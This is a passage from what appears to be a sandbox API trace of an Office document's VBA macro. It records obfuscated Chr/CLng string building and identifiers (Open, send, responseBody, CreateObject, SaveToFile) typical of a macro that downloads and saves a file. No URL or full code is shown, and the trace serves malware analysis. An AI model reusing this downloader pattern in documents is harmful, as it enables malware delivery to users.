lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.030] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="246339") returned 7 [0059.030] VarI4FromStr (in: strIn="246339", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.033] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H987") returned 6 [0059.033] VarI4FromStr (in: strIn="&H987", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.036] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="66490") returned 6 [0059.036] VarI4FromStr (in: strIn="66490", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.036] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.036] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H262") returned 6 [0059.036] VarI4FromStr (in: strIn="&H262", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.036] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="368751") returned 7 [0059.037] VarI4FromStr (in: strIn="368751", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.037] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HE43") returned 6 [0059.037] VarI4FromStr (in: strIn="&HE43", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.037] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="179170") returned 7 [0059.037] VarI4FromStr (in: strIn="179170", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.037] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H616") returned 6 [0059.037] VarI4FromStr (in: strIn="&H616", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.037] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="120978") returned 7 [0059.037] VarI4FromStr (in: strIn="120978", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.037] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.037] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&HA0E") returned 6 [0059.037] VarI4FromStr (in: strIn="&HA0E", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.038] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.038] atoi (_Str="5338") returned 5338 [0059.038] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H152E") returned 7 [0059.038] VarI4FromStr (in: strIn="&H152E", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.038] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="647634") returned 7 [0059.038] VarI4FromStr (in: strIn="647634", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.038] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H24AA") returned 7 [0059.038] VarI4FromStr (in: strIn="&H24AA", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.038] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="389774") returned 7 [0059.038] VarI4FromStr (in: strIn="389774", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.038] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H13C6") returned 7 [0059.038] VarI4FromStr (in: strIn="&H13C6", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.038] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.038] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="86000") returned 6 [0059.039] VarI4FromStr (in: strIn="86000", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.039] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0059.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=6 | out: lpWideCharStr="&H433") returned 6 [0059.039] VarI4FromStr (in: strIn="&H433", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.039] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="211462") returned 7 [0059.039] VarI4FromStr (in: strIn="211462", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.039] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H11F5") returned 7 [0059.039] VarI4FromStr (in: strIn="&H11F5", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.039] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="685630") returned 7 [0059.039] VarI4FromStr (in: strIn="685630", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.039] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=7 | out: lpWideCharStr="&H174A") returned 7 [0059.039] VarI4FromStr (in: strIn="&H174A", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.039] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Chr") returned 0x507e4b [0059.039] atoi (_Str="78") returned 78 [0059.040] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CLng") returned 0x50af63 [0059.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5 [0059.040] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ffce0c05190, cbMultiByte=-1, lpWideCharStr=0x1d3982191b8, cchWideChar=5 | out: lpWideCharStr="&HBD") returned 5 [0059.040] VarI4FromStr (in: strIn="&HBD", lcid=0x409, dwFlags=0x80000000, plOut=0x7ffce0c05000 | out: plOut=0x7ffce0c05000) returned 0x0 [0059.040] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="hhh") returned 0x5098fe [0059.040] strcpy_s (in: _Dst=0x7ffce0c055b0, _DstSize=0x100, _Src="hhh" | out: _Dst="hhh") returned 0x0 [0059.040] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Open") returned 0x500767 [0059.040] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="zzz") returned 0x50fbec [0059.040] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="yyy") returned 0x50e071 [0059.040] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="False") returned 0x502d01 [0059.040] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="hhh") returned 0x5098fe [0059.040] strcpy_s (in: _Dst=0x7ffce0c055b0, _DstSize=0x100, _Src="hhh" | out: _Dst="hhh") returned 0x0 [0059.040] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="send") returned 0x50e4cd [0059.040] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ccc") returned 0x507d83 [0059.040] strcpy_s (in: _Dst=0x7ffce0c055b0, _DstSize=0x100, _Src="ccc" | out: _Dst="ccc") returned 0x0 [0059.040] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="hhh") returned 0x5098fe [0059.040] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="responseBody") returned 0x50c450 [0059.040] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="If") returned 0x505da8 [0059.040] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="hhh") returned 0x5098fe [0059.041] strcpy_s (in: _Dst=0x7ffce0c05050, _DstSize=0x100, _Src="hhh" | out: _Dst="hhh") returned 0x0 [0059.041] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Status") returned 0x502b92 [0059.041] atoi (_Str="200") returned 200 [0059.041] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Then") returned 0x50b933 [0059.041] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Set") returned 0x50d36e [0059.041] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="bbb") returned 0x507804 [0059.041] strcpy_s (in: _Dst=0x7ffce0c05050, _DstSize=0x100, _Src="bbb" | out: _Dst="bbb") returned 0x0 [0059.041] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="CreateObject") returned 0x508af8 [0059.041] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="bbb") returned 0x507804 [0059.041] strcpy_s (in: _Dst=0x7ffce0c055b0, _DstSize=0x100, _Src="bbb" | out: _Dst="bbb") returned 0x0 [0059.041] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Open") returned 0x500767 [0059.041] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="bbb") returned 0x507804 [0059.041] strcpy_s (in: _Dst=0x7ffce0c055b0, _DstSize=0x100, _Src="bbb" | out: _Dst="bbb") returned 0x0 [0059.041] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Type") returned 0x500007 [0059.041] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ggg") returned 0x50937f [0059.041] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="bbb") returned 0x507804 [0059.041] strcpy_s (in: _Dst=0x7ffce0c055b0, _DstSize=0x100, _Src="bbb" | out: _Dst="bbb") returned 0x0 [0059.041] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Write") returned 0x505c2e [0059.041] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ccc") returned 0x507d83 [0059.041] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="bbb") returned 0x507804 [0059.041] strcpy_s (in: _Dst=0x7ffce0c055b0, _DstSize=0x100, _Src="bbb" | out: _Dst="bbb") returned 0x0 [0059.042] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="SaveToFile") returned 0x505f1e [0059.042] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="eee") returned 0x508881 [0059.042] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ggg") returned 0x50937f [0059.042] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="ggg") returned 0x50937f [0059.042] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="bbb") returned 0x507804 [0059.042] strcpy_s (in: _Dst=0x7ffce0c055b0, _DstSize=0x100, _Src="bbb" | out: _Dst="bbb") returned 0x0 [0059.042] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Close") returned 0x5005ab [0059.042] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="End") returned 0x5089cd [0059.042] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="If") returned 0x505da8 [0059.042] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="fff") returned 0x508e00 [0059.042] strcpy_s (in: _Dst=0x7ffce0c055b0, _DstSize=0x100, _Src="fff" | out: _Dst="fff") returned 0x0 [0059.042] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Open") returned 0x500767 [0059.042] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="eee") returned 0x508881 [0059.042] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39da0e610, cb=0x12c0) returned 0x1d39d8f9c30 [0059.042] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="End") returned 0x5089cd [0059.042] LHashValOfNameSysA (syskind=0x3, lcid=0x412, szName="Sub") returned 0x50d5ac [0059.042] IMalloc:Realloc (This=0x7ffd098ff3f0, pv=0x1d39d8f6d40, cb=0x480) returned 0x1d39d8f6d40 [0059.043] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9ef140) [0059.043] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9ed110) [0059.043] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8e6d10) [0059.043] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d8e4ce0) [0059.043] IMalloc:Free (This=0x7ffd098ff3f0, pv=0x1d39d9d4b80) [0059.043] malloc (_Size=0x168) returned 0x1d39bde83e0 [0059.043] malloc (_Size=0x20) returned 0x1d39bde6ab0 [0059.044] lstrcpyA (in: lpString1=0x1d39bde842c, lpString2="PROJECT" | out: lpString1="PROJECT") returned="PROJECT" [0059.044] malloc (_Size=0x138) returned 0x1d39bde8550 [0059.044] malloc (_Size=0x172) returned 0x1d39bde8690 [0059.044] malloc (_Size=0x28) returned 0x1d39bde6b40 [0059.044] malloc (_Size=0x20) returned 0x1d39bde6ae0 [0059.044] lstrlenA (lpString="") returned 0 [0059.044] malloc (_Size=0x1) returned 0x1d39bde0820 [0059.044] malloc (_Size=0x1) returned 0x1d39bde8810 [0059.044] lstrcpyA (in: lpString1=0x1d39bde0820, lpString2="" | out: lpString1="") returned="" [0059.046] malloc (_Size=0x29) returned 0x1d39bde8d50 [0059.046] lstrcpyA (in: lpString1=0x1d39bde8810, lpString2="" | out: lpString1="") returned="" [0059.046] lstrcmpiA (lpString1="ThisDocument", lpString2="ThisDocument") returned 0 [0059.046] lstrlenA (lpString="ThisDocument") returned 12 [0059.046] free (_Block=0x1d39bde8d50) [0059.046] atoi (_Str="393222000") returned 393222000 [0059.046] lstrcpynA (in: lpString1=0x1d39bde695c, lpString2="{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}", iMaxLength=39 | out: lpString1="{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}") returned="{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}" [0059.046] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{00000000-0000-0000-0000-000000000000}", cchWideChar=-1, lpMultiByteStr=0x33e4fb5520, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{00000000-0000-0000-0000-000000000000}", lpUsedDefaultChar=0x0) returned 0 [0059.047] lstrcmpA (lpString1="{00000000-0000-0000-0000-000000000000}", lpString2="{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}") returned -1 [0059.047] lstrlenA (lpString="{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}") returned 38 [0059.047] malloc (_Size=0x4) returned 0x1d39bde8d50 [0059.047] free (_Block=0x1d39bde8d50) [0059.047] lstrlenA (lpString="{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}") returned 38 [0059.047] malloc (_Size=0x1) returned 0x1d39bde8d50 [0059.047] free (_Block=0x1d39bde8d50) [0059.047] lstrlenA (lpString="{5F2DAEFC-FFCC-4142-AE0E-CF02B8440EDF}") returned 38 [0059.047] malloc (_Size=0x1) returned 0x1d39bde8d50 [0059.047] free (_Block=0x1d39bde8d50) [0059.047] free (_Block=0x1d39bde8690) [0059.047] free (_Block=0x1d39bde6ae0) [0059.047] free (_Block=0x1d39bde6b40) [0059.047] free (_Block=0x1d39bde8550) [0059.047] lstrcmpiA (lpString1="Host Extender Info", lpString2="Host Extender Info") returned 0 [0059.047] lstrlenA (lpString="&H00000001") returned 10 [0059.047] malloc (_Size=0xb) returned 0x1d39bde90f0 [0059.047] lstrcmpiA (lpString1="Host Extender Info", lpString2="Host Extender Info") returned 0 [0059.047] lstrcmpiA (lpString1="&H00000001", lpString2="&H00000001") returned 0 [0059.047] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0059.047] malloc (_Size=0x36) returned 0x1d39bde8d50 [0059.047] lstrlenA (lpString="{3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000") returned 53 [0059.047] malloc (_Size=0x68) returned 0x1d39bde8550 [0059.048] CLSIDFromString (in: lpsz="{3832D640-CF90-11CF-8E43-00A0C911005A}", pclsid=0x1d39bde857c | out: pclsid=0x1d39bde857c*(Data1=0x3832d640, Data2=0xcf90, Data3=0x11cf, Data4=([0]=0x8e, [1]=0x43, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x11, [6]=0x0, [7]=0x5a))) returned 0x0 [0059.048] free (_Block=0x1d39bde8d50) [0059.048] free (_Block=0x1d39bde90f0) [0059.048] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0059.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398218cd8, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0059.048] SysStringByteLen (bstr="牐橯捥t") returned 0x7 [0059.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1d398218cd8, cbMultiByte=8, lpWideCharStr=0x1d398543198, cchWideChar=8 | out: lpWideCharStr="Project") returned 8 [0059.048] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Project", cchWideChar=-1, lpMultiByteStr=0x33e4fb4ce0, cbMultiByte=2043, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project", lpUsedDefaultChar=0x0) returned 8 [0059.048] lstrlenA (lpString="Project") returned 7 [0059.048] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x28) returned 0x1d3982190f0 [0059.049] GetWindowThreadProcessId (in: hWnd=0x10312, lpdwProcessId=0x0 | out: lpdwProcessId=0x0) returned 0x1378 [0059.049] SendMessageA (hWnd=0x10312, Msg=0x84, wParam=0x0, lParam=0x12016e) returned 0x2 [0059.050] SendMessageA (hWnd=0x10312, Msg=0x20, wParam=0x10312, lParam=0x2000002) returned 0x1 [0059.058] SetCursor (hCursor=0x10007) returned 0x10007 [0059.059] strnlen (_Str="C:\\Users\\FD1HVy\\Documents", _MaxCount=0x7fffffff) returned 0x19 [0059.059] malloc (_Size=0x1a) returned 0x1d39bde6b70 [0059.059] malloc (_Size=0x1a) returned 0x1d39bde6a50 [0059.059] lstrcpynA (in: lpString1=0x1d39bde6b70, lpString2="C:\\Users\\FD1HVy\\Documents", iMaxLength=26 | out: lpString1="C:\\Users\\FD1HVy\\Documents") returned="C:\\Users\\FD1HVy\\Documents" [0059.060] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x1078) returned 0x1d39d8e4ce0 [0059.060] IMalloc:Alloc (This=0x7ffd098ff3f0, cb=0x1740) returned 0x1d39d8e5d60 [0059.060] GetLocalTime (in: lpSystemTime=0x33e4fb4ed8 | out: lpSystemTime=0x33e4fb4ed8*(wYear=0x7e4, wMonth=0xc, wDayOfWeek=0x4, wDay=0x18, wHour=0x8, wMinute=0x24, wSecond=0x28, wMilliseconds=0x155)) [0059.060] _ultow_s (in: _Value=0x61d40718, _Buffer=0x1d39d8e4d0a, _BufferCount=0x7ff, _Radix=16 | out: _Buffer="61d40718") returned 0x0 [0059.060] wcsncpy_s (in: _Destination=0x33e4fb4ba0, _SizeInWords=0x108, _Source="*\\Z0261d40718", _MaxCount=0x106 | out: _Destination="*\\Z0261d40718") returned 0x0 [0059.060] CharLowerBuffW (in: lpsz="*\\Z0261d40718", cchLength=0xd | out: lpsz="*\\z0261d40718") returned 0xd [0059.060] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\z0261d40718", cchWideChar=14, lpMultiByteStr=0x33e4fb4ad0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\z0261d40718", lpUsedDefaultChar=0x0) returned 14 [0059.060] wcscpy_s (in: _Destination=0x1d39d7de630, _SizeInWords=0xe, _Source="*\\Z0261d40718" | out: _Destination="*\\Z0261d40718") returned 0x0 [0059.060] 